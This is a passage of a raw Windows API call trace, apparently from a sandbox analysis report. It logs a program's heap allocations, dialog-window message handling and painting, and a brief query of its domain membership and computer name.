0xe1feb0 [0259.357] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddca98 [0259.357] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32c98 [0259.357] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddca98 | out: hHeap=0xbc0000) returned 1 [0259.357] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fdc0 [0259.357] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddca98 [0259.357] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda530 [0259.357] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7ef0 | out: hHeap=0xbc0000) returned 1 [0259.357] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.357] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe31fe8 [0259.357] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32008 [0259.357] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fd48 [0259.357] CharUpperBuffW (in: lpsz="DOMAINCHECK", cchLength=0xb | out: lpsz="DOMAINCHECK") returned 0xb [0259.357] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe1fd48 | out: hHeap=0xbc0000) returned 1 [0259.357] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32008 | out: hHeap=0xbc0000) returned 1 [0259.358] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xdd7ef0 [0259.358] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xde54f8 [0259.358] PeekMessageW (in: lpMsg=0x7df994, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df994) returned 0 [0259.358] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32008 [0259.358] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32008 | out: hHeap=0xbc0000) returned 1 [0259.358] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fd48 [0259.358] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddcae0 [0259.358] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32008 [0259.358] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddcae0 | out: hHeap=0xbc0000) returned 1 [0259.358] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xe49ed0 [0259.358] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddcae0 [0259.358] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fcf8 [0259.358] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8028 [0259.358] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32c48 [0259.358] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd8028 | out: hHeap=0xbc0000) returned 1 [0259.358] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xe49e28 [0259.359] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8028 [0259.359] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1ff00 [0259.359] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc810 [0259.359] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32ca8 [0259.359] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc810 | out: hHeap=0xbc0000) returned 1 [0259.359] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xe49df0 [0259.359] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc810 [0259.359] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe200b8 [0259.359] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd80b8 [0259.359] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32c08 [0259.359] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd80b8 | out: hHeap=0xbc0000) returned 1 [0259.359] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xe49db8 [0259.359] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd80b8 [0259.359] PeekMessageW (in: lpMsg=0x7df994, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df994) returned 0 [0259.359] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe200e0 [0259.364] NetGetJoinInformation (in: lpServer="", lpNameBuffer=0x7dee00, BufferType=0x7dee18 | out: lpNameBuffer=0x7dee00*="WORKGROUP", BufferType=0x7dee18) returned 0x0 [0259.376] NetApiBufferSize (in: Buffer=0xdeda50, ByteCount=0x7de7b0 | out: ByteCount=0x7de7b0) returned 0x0 [0259.387] GetComputerNameW (in: lpBuffer=0x7df5d0, nSize=0x7df8ec | out: lpBuffer="XDUWTFONO", nSize=0x7df8ec) returned 1 [0259.390] GetWindowTextLengthW (hWnd=0x500a2) returned 413 [0259.390] SendMessageW (hWnd=0x500a2, Msg=0xb1, wParam=0x19d, lParam=0x19d) returned 0x1 [0259.391] GetClientRect (in: hWnd=0x500a2, lpRect=0x7df920 | out: lpRect=0x7df920) returned 1 [0259.391] GetWindowRect (in: hWnd=0x500a2, lpRect=0x7df920 | out: lpRect=0x7df920) returned 1 [0259.391] SetWindowLongW (hWnd=0x500a2, nIndex=-21, dwNewLong=8) returned 0 [0259.391] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe4aa60 | out: hHeap=0xbc0000) returned 1 [0259.391] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe4a5d8 | out: hHeap=0xbc0000) returned 1 [0259.391] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32b08 | out: hHeap=0xbc0000) returned 1 [0259.391] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc900 | out: hHeap=0xbc0000) returned 1 [0259.391] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7ef0 | out: hHeap=0xbc0000) returned 1 [0259.391] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc9a8 | out: hHeap=0xbc0000) returned 1 [0259.391] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc6d8 | out: hHeap=0xbc0000) returned 1 [0259.391] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc9d8 | out: hHeap=0xbc0000) returned 1 [0259.391] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc810 | out: hHeap=0xbc0000) returned 1 [0259.391] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd80d0 | out: hHeap=0xbc0000) returned 1 [0259.391] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe201d0 | out: hHeap=0xbc0000) returned 1 [0259.391] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31fe8 | out: hHeap=0xbc0000) returned 1 [0259.399] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc858 | out: hHeap=0xbc0000) returned 1 [0259.399] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32bc8 | out: hHeap=0xbc0000) returned 1 [0259.400] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddcb70 | out: hHeap=0xbc0000) returned 1 [0259.400] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32b08 | out: hHeap=0xbc0000) returned 1 [0259.400] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc9d8 | out: hHeap=0xbc0000) returned 1 [0259.400] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc6d8 | out: hHeap=0xbc0000) returned 1 [0259.400] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc9a8 | out: hHeap=0xbc0000) returned 1 [0259.400] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7ef0 | out: hHeap=0xbc0000) returned 1 [0259.400] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd80b8 | out: hHeap=0xbc0000) returned 1 [0259.400] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc900 | out: hHeap=0xbc0000) returned 1 [0259.400] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe20220 | out: hHeap=0xbc0000) returned 1 [0259.400] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.400] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe2bed8 | out: hHeap=0xbc0000) returned 1 [0259.400] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.424] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.424] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.424] NtdllDialogWndProc_W () returned 0x0 [0259.450] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.450] NtdllDialogWndProc_W () returned 0x0 [0259.452] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.452] NtdllDialogWndProc_W () returned 0x0 [0259.452] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.452] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.452] NtdllDialogWndProc_W () returned 0x0 [0259.452] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.453] NtdllDialogWndProc_W () returned 0x0 [0259.453] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.453] NtdllDialogWndProc_W () returned 0x0 [0259.454] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.454] NtdllDialogWndProc_W () returned 0x0 [0259.455] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.455] NtdllDialogWndProc_W () returned 0x1 [0259.455] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.455] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.455] GetSysColor (nIndex=15) returned 0xf0f0f0 [0259.455] SetBkColor (hdc=0x25010733, color=0xf0f0f0) returned 0xffffff [0259.455] CreateSolidBrush (color=0xf0f0f0) returned 0x2e1006f6 [0259.455] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xddc888 [0259.455] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xddc8b8 [0259.456] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.456] NtdllDialogWndProc_W () returned 0x0 [0259.457] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.457] NtdllDialogWndProc_W () returned 0x0 [0259.459] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.459] NtdllDialogWndProc_W () returned 0x0 [0259.460] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.461] NtdllDialogWndProc_W () returned 0x1 [0259.461] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.461] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.461] GetSysColor (nIndex=15) returned 0xf0f0f0 [0259.461] SetBkColor (hdc=0x25010733, color=0xf0f0f0) returned 0xf0f0f0 [0259.461] GetForegroundWindow () returned 0x60174 [0259.461] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc900 | out: hHeap=0xbc0000) returned 1 [0259.461] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe20220 | out: hHeap=0xbc0000) returned 1 [0259.461] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 1 [0259.461] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.461] NtdllDialogWndProc_W () returned 0x0 [0259.462] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.462] NtdllDialogWndProc_W () returned 0x0 [0259.462] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.462] NtdllDialogWndProc_W () returned 0x0 [0259.462] TranslateMessage (lpMsg=0x7dfdb4) returned 0 [0259.462] DispatchMessageW (lpMsg=0x7dfdb4) returned 0x0 [0259.462] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 1 [0259.462] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.462] GetWindowLongW (hWnd=0x60174, nIndex=-20) returned 256 [0259.462] NtdllDialogWndProc_W () returned 0x1 [0259.462] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.462] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.462] GetClientRect (in: hWnd=0x60174, lpRect=0x7dfb00 | out: lpRect=0x7dfb00) returned 1 [0259.462] GetCursorPos (in: lpPoint=0x7dfb10 | out: lpPoint=0x7dfb10*(x=781, y=507)) returned 1 [0259.462] ScreenToClient (in: hWnd=0x60174, lpPoint=0x7dfb10 | out: lpPoint=0x7dfb10) returned 1 [0259.462] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0259.462] SetCursor (hCursor=0x10003) returned 0x10007 [0259.463] IsDialogMessageW (hDlg=0x60174, lpMsg=0x7dfdb4) returned 1 [0259.463] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.463] NtdllDialogWndProc_W () returned 0x0 [0259.464] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 1 [0259.464] IsDialogMessageW (hDlg=0x60174, lpMsg=0x7dfdb4) returned 1 [0259.464] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.464] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.464] BeginPaint (in: hWnd=0x60174, lpPaint=0x7dfaa8 | out: lpPaint=0x7dfaa8) returned 0x25010733 [0259.464] EndPaint (hWnd=0x60174, lpPaint=0x7dfaa8) returned 1 [0259.464] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 1 [0259.464] IsDialogMessageW (hDlg=0x60174, lpMsg=0x7dfdb4) returned 1 [0259.465] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.465] NtdllDialogWndProc_W () returned 0x1 [0259.465] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.465] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.465] GetSysColor (nIndex=15) returned 0xf0f0f0 [0259.465] SetBkColor (hdc=0x3a0101d8, color=0xf0f0f0) returned 0xffffff [0259.465] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.465] NtdllDialogWndProc_W () returned 0x0 [0259.465] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.465] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.465] GetSysColor (nIndex=15) returned 0xf0f0f0 [0259.465] SetBkColor (hdc=0x3a0101d8, color=0xf0f0f0) returned 0xf0f0f0 [0259.465] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.465] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.465] GetWindowLongW (hWnd=0x8014a, nIndex=-21) returned 3 [0259.465] NtdllDialogWndProc_W () returned 0x0 [0259.466] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.466] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.466] GetWindowLongW (hWnd=0x8014a, nIndex=-21) returned 3 [0259.466] NtdllDialogWndProc_W () returned 0x0 [0259.466] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 1 [0259.466] IsDialogMessageW (hDlg=0x60174, lpMsg=0x7dfdb4) returned 1 [0259.466] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.466] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.466] GetWindowLongW (hWnd=0x40168, nIndex=-21) returned 4 [0259.467] GetWindowLongW (hWnd=0x40168, nIndex=-21) returned 4 [0259.467] GetSysColor (nIndex=15) returned 0xf0f0f0 [0259.467] SetTextColor (hdc=0x43010772, color=0xff00) returned 0x0 [0259.467] SetBkColor (hdc=0x43010772, color=0x0) returned 0xffffff [0259.467] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.467] NtdllDialogWndProc_W () returned 0x1 [0259.467] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.467] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.467] GetSysColor (nIndex=15) returned 0xf0f0f0 [0259.467] SetBkColor (hdc=0x43010772, color=0xf0f0f0) returned 0x0 [0259.468] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.468] NtdllDialogWndProc_W () returned 0x0 [0259.469] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.470] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.470] GetWindowLongW (hWnd=0x40168, nIndex=-21) returned 4 [0259.470] GetWindowLongW (hWnd=0x40168, nIndex=-21) returned 4 [0259.470] GetSysColor (nIndex=15) returned 0xf0f0f0 [0259.470] SetTextColor (hdc=0x43010772, color=0xff00) returned 0x0 [0259.470] SetBkColor (hdc=0x43010772, color=0x0) returned 0xffffff [0259.470] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.470] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.470] GetWindowLongW (hWnd=0x40168, nIndex=-21) returned 4 [0259.470] GetWindowLongW (hWnd=0x40168, nIndex=-21) returned 4 [0259.470] GetSysColor (nIndex=15) returned 0xf0f0f0 [0259.470] SetTextColor (hdc=0x43010772, color=0xff00) returned 0xff00 [0259.470] SetBkColor (hdc=0x43010772, color=0x0) returned 0x0 [0259.470] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.470] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.471] GetWindowLongW (hWnd=0x40168, nIndex=-21) returned 4 [0259.471] GetWindowLongW (hWnd=0x40168, nIndex=-21) returned 4 [0259.471] GetSysColor (nIndex=15) returned 0xf0f0f0 [0259.471] SetTextColor (hdc=0x43010772, color=0xff00) returned 0xff00 [0259.471] SetBkColor (hdc=0x43010772, color=0x0) returned 0x0 [0259.476] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 1 [0259.476] IsDialogMessageW (hDlg=0x60174, lpMsg=0x7dfdb4) returned 1 [0259.477] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.477] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.477] GetWindowLongW (hWnd=0x4016a, nIndex=-21) returned 5 [0259.477] GetWindowLongW (hWnd=0x4016a, nIndex=-21) returned 5 [0259.477] GetSysColor (nIndex=15) returned 0xf0f0f0 [0259.477] SetTextColor (hdc=0x43010772, color=0x0) returned 0x0 [0259.477] SetBkColor (hdc=0x43010772, color=0xf0f0f0) returned 0xffffff [0259.483] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 1 [0259.483] IsDialogMessageW (hDlg=0x60174, lpMsg=0x7dfdb4) returned 1 [0259.483] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.483] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.484] GetWindowLongW (hWnd=0x4015e, nIndex=-21) returned 6 [0259.484] GetWindowLongW (hWnd=0x4015e, nIndex=-21) returned 6 [0259.484] GetSysColor (nIndex=15) returned 0xf0f0f0 [0259.484] GetWindowLongW (hWnd=0x4015e, nIndex=-16) returned 1342242944 [0259.484] GetSysColor (nIndex=5) returned 0xffffff [0259.484] GetSysColor (nIndex=8) returned 0x0 [0259.484] SetTextColor (hdc=0x43010772, color=0x0) returned 0x0 [0259.484] SetBkColor (hdc=0x43010772, color=0xffffff) returned 0xffffff [0259.484] CreateSolidBrush (color=0xffffff) returned 0x1b100273 [0259.484] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xddc900 [0259.484] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xddc8d0 [0259.484] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.484] NtdllDialogWndProc_W () returned 0x1 [0259.484] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.485] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.485] GetSysColor (nIndex=15) returned 0xf0f0f0 [0259.485] SetBkColor (hdc=0x190101ed, color=0xf0f0f0) returned 0xffffff [0259.485] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.485] NtdllDialogWndProc_W () returned 0x0 [0259.486] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.486] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.486] GetWindowLongW (hWnd=0x4015e, nIndex=-21) returned 6 [0259.486] GetWindowLongW (hWnd=0x4015e, nIndex=-21) returned 6 [0259.486] GetSysColor (nIndex=15) returned 0xf0f0f0 [0259.486] GetWindowLongW (hWnd=0x4015e, nIndex=-16) returned 1342242944 [0259.486] GetSysColor (nIndex=5) returned 0xffffff [0259.486] GetSysColor (nIndex=8) returned 0x0 [0259.486] SetTextColor (hdc=0x1a0101ed, color=0x0) returned 0x0 [0259.486] SetBkColor (hdc=0x1a0101ed, color=0xffffff) returned 0xffffff [0259.489] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 1 [0259.489] IsDialogMessageW (hDlg=0x60174, lpMsg=0x7dfdb4) returned 1 [0259.490] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.490] NtdllDialogWndProc_W () returned 0x1 [0259.490] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.490] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.490] GetSysColor (nIndex=15) returned 0xf0f0f0 [0259.490] SetBkColor (hdc=0x1b0101ed, color=0xf0f0f0) returned 0xffffff [0259.490] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.490] NtdllDialogWndProc_W () returned 0x0 [0259.490] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.490] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.491] GetSysColor (nIndex=15) returned 0xf0f0f0 [0259.491] SetBkColor (hdc=0x1b0101ed, color=0xf0f0f0) returned 0xf0f0f0 [0259.491] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.491] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.491] GetWindowLongW (hWnd=0x4010a, nIndex=-21) returned 7 [0259.491] NtdllDialogWndProc_W () returned 0x0 [0259.491] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.491] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.491] GetWindowLongW (hWnd=0x4010a, nIndex=-21) returned 7 [0259.491] NtdllDialogWndProc_W () returned 0x0 [0259.491] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 1 [0259.491] IsDialogMessageW (hDlg=0x60174, lpMsg=0x7dfdb4) returned 1 [0259.491] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.492] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.492] GetWindowLongW (hWnd=0x500a2, nIndex=-21) returned 8 [0259.492] GetWindowLongW (hWnd=0x500a2, nIndex=-21) returned 8 [0259.492] GetSysColor (nIndex=15) returned 0xf0f0f0 [0259.492] GetWindowLongW (hWnd=0x500a2, nIndex=-16) returned 1342179332 [0259.492] GetSysColor (nIndex=15) returned 0xf0f0f0 [0259.492] GetSysColor (nIndex=8) returned 0x0 [0259.492] SetTextColor (hdc=0xd010720, color=0x0) returned 0x0 [0259.492] SetBkColor (hdc=0xd010720, color=0xf0f0f0) returned 0xffffff [0259.496] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.496] NtdllDialogWndProc_W () returned 0x1 [0259.496] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.496] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.496] GetSysColor (nIndex=15) returned 0xf0f0f0 [0259.496] SetBkColor (hdc=0x3c0101d8, color=0xf0f0f0) returned 0xffffff [0259.496] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.497] NtdllDialogWndProc_W () returned 0x0 [0259.497] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.497] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.497] GetWindowLongW (hWnd=0x500a2, nIndex=-21) returned 8 [0259.497] GetWindowLongW (hWnd=0x500a2, nIndex=-21) returned 8 [0259.497] GetSysColor (nIndex=15) returned 0xf0f0f0 [0259.498] GetWindowLongW (hWnd=0x500a2, nIndex=-16) returned 1342179332 [0259.498] GetSysColor (nIndex=15) returned 0xf0f0f0 [0259.498] GetSysColor (nIndex=8) returned 0x0 [0259.498] SetTextColor (hdc=0xd010720, color=0x0) returned 0x0 [0259.498] SetBkColor (hdc=0xd010720, color=0xf0f0f0) returned 0xffffff [0259.498] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.498] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.498] GetWindowLongW (hWnd=0x500a2, nIndex=-21) returned 8 [0259.498] GetWindowLongW (hWnd=0x500a2, nIndex=-21) returned 8 [0259.498] GetSysColor (nIndex=15) returned 0xf0f0f0 [0259.498] GetWindowLongW (hWnd=0x500a2, nIndex=-16) returned 1342179332 [0259.498] GetSysColor (nIndex=15) returned 0xf0f0f0 [0259.498] GetSysColor (nIndex=8) returned 0x0 [0259.498] SetTextColor (hdc=0xd010720, color=0x0) returned 0x0 [0259.498] SetBkColor (hdc=0xd010720, color=0xf0f0f0) returned 0xf0f0f0 [0259.498] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.498] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.499] GetWindowLongW (hWnd=0x500a2, nIndex=-21) returned 8 [0259.499] GetWindowLongW (hWnd=0x500a2, nIndex=-21) returned 8 [0259.499] GetSysColor (nIndex=15) returned 0xf0f0f0 [0259.499] GetWindowLongW (hWnd=0x500a2, nIndex=-16) returned 1342179332 [0259.499] GetSysColor (nIndex=15) returned 0xf0f0f0 [0259.499] GetSysColor (nIndex=8) returned 0x0 [0259.499] SetTextColor (hdc=0xd010720, color=0x0) returned 0x0 [0259.499] SetBkColor (hdc=0xd010720, color=0xf0f0f0) returned 0xf0f0f0 [0259.501] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 1 [0259.501] TranslateMessage (lpMsg=0x7dfdb4) returned 0 [0259.502] DispatchMessageW (lpMsg=0x7dfdb4) returned 0x0 [0259.502] GetForegroundWindow () returned 0x60174 [0259.502] GetWindowLongW 